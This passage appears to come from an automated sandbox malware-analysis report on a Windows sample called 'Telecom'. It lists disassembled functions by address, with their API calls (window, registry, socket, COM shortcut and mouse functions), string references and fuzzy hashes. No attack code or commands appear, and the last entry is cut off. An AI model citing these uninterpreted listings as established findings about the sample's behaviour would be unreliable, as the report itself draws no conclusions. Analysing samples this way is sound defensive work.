SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004D4BBD
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004D4BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004D4BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004D4BE3

Strings

Msctls_Progress32, xrefs: 004D4B81

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: a0815bb844d4ee62dcad7887e363cc890387ed4937d1c6839f1b510f28245cbf
Instruction ID: bb06d2b24e90c1d074e28d52f621d4ac221b0fb8dbfe6a11d2f04e1f956e091d
Opcode Fuzzy Hash: a0815bb844d4ee62dcad7887e363cc890387ed4937d1c6839f1b510f28245cbf
Instruction Fuzzy Hash: 6B1193B155021DBEEF119FA5CC85EEB7F6DEF08758F014112B608A2190CB76DC219BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004A6078 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 004A608D
_memcmp.LIBVCRUNTIME ref: 004A60AB
_memcmp.LIBVCRUNTIME ref: 004A60BE
_memcmp.LIBVCRUNTIME ref: 004A60D6
_memcmp.LIBVCRUNTIME ref: 004A60EE

Strings

j`J, xrefs: 004A609B

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: _memcmp
String ID: j`J
API String ID: 2931989736-1240814797
Opcode ID: 824bfaa4df5b7780e9c2c6cc00929ebf058f849f272792eb88bc414255ef0cb1
Instruction ID: a38fd6ab61b6a6f48fe486138935d0f28f85d89a88aef54ccbf3877ea6ac598d
Opcode Fuzzy Hash: 824bfaa4df5b7780e9c2c6cc00929ebf058f849f272792eb88bc414255ef0cb1
Instruction Fuzzy Hash: 540126E26043047B931096225C42F6B731DDF3239EB1A0427FE058A241F76DED90C1AE

Uniqueness

Uniqueness Score: -1.00%

Function 004AE30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 004AE328
LoadStringW.USER32(00000000), ref: 004AE32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004AE345
LoadStringW.USER32(00000000), ref: 004AE34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 004AE390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 004AE36D

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 151bd3fd862caa1cdf5d14143d6ae01427031b9ff812edf5d17be96ea08d61e0
Instruction ID: 64fa01a2f50eba8a13c2b24d49ca62f97a76f1610751faba38def1e7aea5e51b
Opcode Fuzzy Hash: 151bd3fd862caa1cdf5d14143d6ae01427031b9ff812edf5d17be96ea08d61e0
Instruction Fuzzy Hash: D20186F2D002087FE71197A48D89EFB776CDB08300F0145A3B716E6041E6749E848B79

Uniqueness

Uniqueness Score: -1.00%

Function 004B1312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 004B1322
EnterCriticalSection.KERNEL32(00000000,?), ref: 004B1334
TerminateThread.KERNEL32(00000000,000001F6), ref: 004B1342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 004B1350
CloseHandle.KERNEL32(00000000), ref: 004B135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 004B136F
LeaveCriticalSection.KERNEL32(00000000), ref: 004B1376

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: f4b07ce9a1915cc67a8887509bb39aa386d5720aa0adcea8b33578bbfd1370e2
Instruction ID: 340f159dc4b3172276622ef51d90c079c74bced76da740974e0f89d9dfd1721c
Opcode Fuzzy Hash: f4b07ce9a1915cc67a8887509bb39aa386d5720aa0adcea8b33578bbfd1370e2
Instruction Fuzzy Hash: FBF0EC32443612BBD7411B54EE4DBDABB79FF05302F802132F501918B097749471CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004C26BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 004C281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004C283E
WSAGetLastError.WSOCK32 ref: 004C284F
htons.WSOCK32(?,?,?,?,?), ref: 004C2938
inet_ntoa.WSOCK32(?), ref: 004C28E9

Part of subcall function 004A433E: _strlen.LIBCMT ref: 004A4348

Part of subcall function 004C3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,004BF669), ref: 004C3C9D

_strlen.LIBCMT ref: 004C2992

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 1ce0e1d12362c2a57b9d9aba9a74b299c21e37f03dbbcad74554bba45ce76e79
Instruction ID: 38f8fa1eab197ac1f5257ee16345275d60909f8e1b552342e15eaeb205dd624c
Opcode Fuzzy Hash: 1ce0e1d12362c2a57b9d9aba9a74b299c21e37f03dbbcad74554bba45ce76e79
Instruction Fuzzy Hash: 00B11279600300AFD320DF25C885F2BB7A4AF84318F54855EF4564B3A2DBBAED42CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00470527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0047042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00470446
__allrem.LIBCMT ref: 0047045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0047047B
__allrem.LIBCMT ref: 00470492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004704B0

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction ID: 22f2f4f37b3f842147f90c2892e4344be8419d76aef18c1695aec182eb19fe37
Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction Fuzzy Hash: 7781D672601705EBE720AF79CC81BEB73A9AF44328F14C52FE519D6381E7B8D9018799

Uniqueness

Uniqueness Score: -1.00%

Function 00476571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00468649,00468649,?,?,?,004767C2,00000001,00000001,8BE85006), ref: 004765CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004767C2,00000001,00000001,8BE85006,?,?,?), ref: 00476651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0047674B
__freea.LIBCMT ref: 00476758

Part of subcall function 00473B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00466A79,?,0000015D,?,?,?,?,004685B0,000000FF,00000000,?,?), ref: 00473BC5

__freea.LIBCMT ref: 00476761
__freea.LIBCMT ref: 00476786

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 832a612e62228f2d16e533fce2fc25dec3033863de74d07ba316acdc7b6b396f
Instruction ID: 0a4f5ceb02d7fde52eb732b4c784fcd2112b277ee0140d9602a554b57c8dc7dc
Opcode Fuzzy Hash: 832a612e62228f2d16e533fce2fc25dec3033863de74d07ba316acdc7b6b396f
Instruction Fuzzy Hash: 68510772600506AFDB285E64CC41EEF77ABEB40758F16866BFC0CD6240EB38DC509658

Uniqueness

Uniqueness Score: -1.00%

Function 004CC63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333

Part of subcall function 004CD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004CC10E,?,?), ref: 004CD415
Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD451
Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD4C8
Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004CC72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004CC785
RegCloseKey.ADVAPI32(00000000), ref: 004CC7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 004CC7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 004CC853
RegCloseKey.ADVAPI32(?), ref: 004CC85F

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: a424d2588404cdba2283cc85744083059341572e5fe11f3302f311760e09b88b
Instruction ID: f6c3252aaed71708ceee6e2b5905c4516d730492a4de683137660a6883bb85dd
Opcode Fuzzy Hash: a424d2588404cdba2283cc85744083059341572e5fe11f3302f311760e09b88b
Instruction Fuzzy Hash: EF817D74508241AFD754DF24C885F2ABBE5FF84308F1444AEF4598B2A2DB35ED06CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004A009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 004A00A9
SysAllocString.OLEAUT32(00000000), ref: 004A0150
VariantCopy.OLEAUT32(004A0354,00000000), ref: 004A0179
VariantClear.OLEAUT32(004A0354), ref: 004A019D
VariantCopy.OLEAUT32(004A0354,00000000), ref: 004A01A1
VariantClear.OLEAUT32(?), ref: 004A01AB

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: dea5ce99a933890bf657881946eb56ae045fbe4ad68c6cb25b19a6afe6373289
Instruction ID: d1fe811c8707925fa5a77a64207b0dce9a0c0b1f295ec8887ddf5f57470b9f49
Opcode Fuzzy Hash: dea5ce99a933890bf657881946eb56ae045fbe4ad68c6cb25b19a6afe6373289
Instruction Fuzzy Hash: A6513D31500310E6CF10AF659885769B3A5EF67314F14848BF806DF296DB788C45CB9F

Uniqueness

Uniqueness Score: -1.00%

Function 004B6ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004B6F21
CoInitialize.OLE32(00000000), ref: 004B707E
CoCreateInstance.OLE32(004E0CC4,00000000,00000001,004E0B34,?), ref: 004B7095
CoUninitialize.OLE32 ref: 004B7319

Strings

.lnk, xrefs: 004B6EFF, 004B6F69, 004B7025

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: a5472a25b1054c3d26723fec2aae03f2be02fdd14057f724cccae24b710e2442
Instruction ID: 49006135244f8065ec1615c25060b59d2875b0421924d96eb743209ef6fa8040
Opcode Fuzzy Hash: a5472a25b1054c3d26723fec2aae03f2be02fdd14057f724cccae24b710e2442
Instruction Fuzzy Hash: 3DD16B71508201AFD304EF25C881EABB7E8FF98708F40496EF5859B262DB75ED05CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004B1196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 004B11B3
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 004B11EE
EnterCriticalSection.KERNEL32(?), ref: 004B120A
LeaveCriticalSection.KERNEL32(?), ref: 004B1283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 004B129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 004B12C8

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 04bdd164b7ef90529d18f485605787acaf77c4941bf3aa6170ff1bf850270b69
Instruction ID: 014fff0577b65510da415c32404043e9a0c74d81b9a86d54b6c833b774142f3d
Opcode Fuzzy Hash: 04bdd164b7ef90529d18f485605787acaf77c4941bf3aa6170ff1bf850270b69
Instruction Fuzzy Hash: 11419071900205EFDF049F54DC85AAA77B8FF05304F1440AAED00AB2A6DB34DE51DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004D8C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0049FBEF,00000000,?,?,00000000,?,004839E2,00000004,00000000,00000000), ref: 004D8CA7
EnableWindow.USER32(?,00000000), ref: 004D8CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 004D8D2C
ShowWindow.USER32(?,00000004), ref: 004D8D40
EnableWindow.USER32(?,00000001), ref: 004D8D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 004D8D8A

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 1d2f420f011a7ed3183e7e0c0ccb17dbdfc890378de025d6dd9a8ebbe0402441
Instruction ID: c5f623f92aec6c54e7024ce8ce881cbe2f9e5f7190690e1479fffcc0e202ce6a
Opcode Fuzzy Hash: 1d2f420f011a7ed3183e7e0c0ccb17dbdfc890378de025d6dd9a8ebbe0402441
Instruction Fuzzy Hash: 9D417130602244EFDB25DF24C899BB67BE1FB55B04F1840AFE5084B3A2CB35A859DB54

Uniqueness

Uniqueness Score: -1.00%

Function 004C2D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 004C2D45

Part of subcall function 004BEF33: GetWindowRect.USER32(?,?), ref: 004BEF4B

GetDesktopWindow.USER32 ref: 004C2D6F
GetWindowRect.USER32(00000000), ref: 004C2D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 004C2DB2
GetCursorPos.USER32(?), ref: 004C2DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004C2E3C

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: d0399582c1a02e957c99ebe1c819bfe4b7485c4c218b62dc7941ab56b9feab79
Instruction ID: b244ecce01d523f6748d66391cf2522e91a0c1a0acf5c1bbc67a301bfcc8dc2b
Opcode Fuzzy Hash: d0399582c1a02e957c99ebe1c819bfe4b7485c4c218b62dc7941ab56b9feab79
Instruction Fuzzy Hash: 8D311072906315ABC720DF14D844F9BB7A9FB95314F00092EF48597181DAB4E908CBEA

Uniqueness

Uniqueness Score: -1.00%

Function 004A55E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004A55F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004A5616
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004A564E
_wcslen.LIBCMT ref: 004A566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004A5674
_wcsstr.LIBVCRUNTIME ref: 004A567E

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: aa8ab05f2749432ad357ae70ca42e5f0c6e4db750c288020092a3214bd768c0b
Instruction ID: 13ed4524fcd07831a8a6bba467ae3c883831675a2601e852d403077da22548b4
Opcode Fuzzy Hash: aa8ab05f2749432ad357ae70ca42e5f0c6e4db750c288020092a3214bd768c0b
Instruction Fuzzy Hash: 6C213832604600BBEB155B35DD49EBF7BACDF56710F14403FF809CA191EB69CC4196A9

Uniqueness

Uniqueness Score: -1.00%

Function 004B6263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00445851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004455D1,?,?,00484B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00445871

_wcslen.LIBCMT ref: 004B62C0
CoInitialize.OLE32(00000000), ref: 004B63DA
CoCreateInstance.OLE32(004E0CC4,00000000,00000001,004E0B34,?), ref: 004B63F3
CoUninitialize.OLE32 ref: 004B6411

Strings

.lnk, xrefs: 004B62BB, 004B6306, 004B63CA

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 3bf9b1c4a1291a0062e7eae7c9a23b1ea416f4d12f6227ef4637e19fd4f67590
Instruction ID: e18f4ad0990e1e569f3221856c3009c609581e0f28031af5cb21eb84e07cf03f
Opcode Fuzzy Hash: 3bf9b1c4a1291a0062e7eae7c9a23b1ea416f4d12f6227ef4637e19fd4f67590
Instruction Fuzzy Hash: 74D14371A043019FC714EF25C480A6ABBE5FF89714F15885EF8859B361CB39EC45CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004730E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00464D53,00000000,?,?,004668E2,?,?,00000000), ref: 004730EB
_free.LIBCMT ref: 0047311E
_free.LIBCMT ref: 00473146
SetLastError.KERNEL32(00000000,?,00000000), ref: 00473153
SetLastError.KERNEL32(00000000,?,00000000), ref: 0047315F
_abort.LIBCMT ref: 00473165

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: cf4a37621cf5c5c88b4779cb3dfc1a8473e0b36986e4fcc6743b0c7470ac7851
